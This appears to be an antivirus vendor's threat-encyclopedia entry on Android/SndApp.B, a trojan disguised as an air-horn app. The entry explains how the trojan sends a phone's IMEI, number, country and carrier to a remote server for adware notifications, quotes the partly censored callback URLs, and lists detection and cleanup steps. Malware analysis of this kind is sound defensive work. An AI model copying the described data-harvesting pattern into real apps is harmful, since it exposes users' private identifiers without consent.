virus logo Mobile Virus

Android/SndApp.B!tr

description-logoAnalysis

Android/SndApp.B!tr is a variant of Android/SndApp.A!tr.spy.
The malware runs on Android phones, version 2.1 and above.
This variant does not send memorized accounts or emails. It only sends to a remote web site the following information:

  • IMEI
  • phone number
  • country
  • operator
The remote web site answers with some advertisement to pop up on the screen of the phone.


Technical Details


The malware consists in three main components:
  • the main entry point, AirHorn, which is called when the victim launches the application.
  • a background service, com.and.snd.AndroidSoundService
  • and installation refererrer receiver
Initially, when the malware is installed (via a referrer), the referrer provides some parameters (aid and cookieid -- see below). The malware then visits the following URL: 
http://[CENSORED]66.com/lead/e2c4x2a494x2/&pid=2738&aid=XXX&cookieid=YY
The remote end replies with an affiliate ID, subid, ext and cookie.
Then, when the victim launches the malware, the AirHorn class is created and verifies that the background AndroidSoundService is running (if not, runs it).
The malware retrieves the phone's IMEI, line number, network country iso string and operator name. Then, it visits the following URL: 
http://[CENSORED]ios.com/android_notifier/notifier.php?
 app=airhorn&deviceId=IMEI&mobile=PHONENUMBER&country=COUNTRY&carrier=CARRIER
The IMEI and phone number (at least) are considered private information and should not be sent over without user's consent, in clear text moreover.
Every hour, the malware potentially displays a notification with a title, text and link (all this information is sent by the remote end).

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
Extreme
FortiClient
Extended
FortiMail
Extended
FortiSandbox
Extended
FortiWeb
Extended
Web Application Firewall
Extended
FortiIsolator
Extended
FortiDeceptor
Extended
FortiEDR

Version Updates

Date Version Detail
2019-04-12 67.75300
ID 3302891
Released Nov 16, 2011
Description
Updated		 Nov 16, 2011
Aliases Trojan-Spy.AndroidOS.Typstu.av (KAV), Andr/Spy-E (Sophos)
Platform Profile Android platform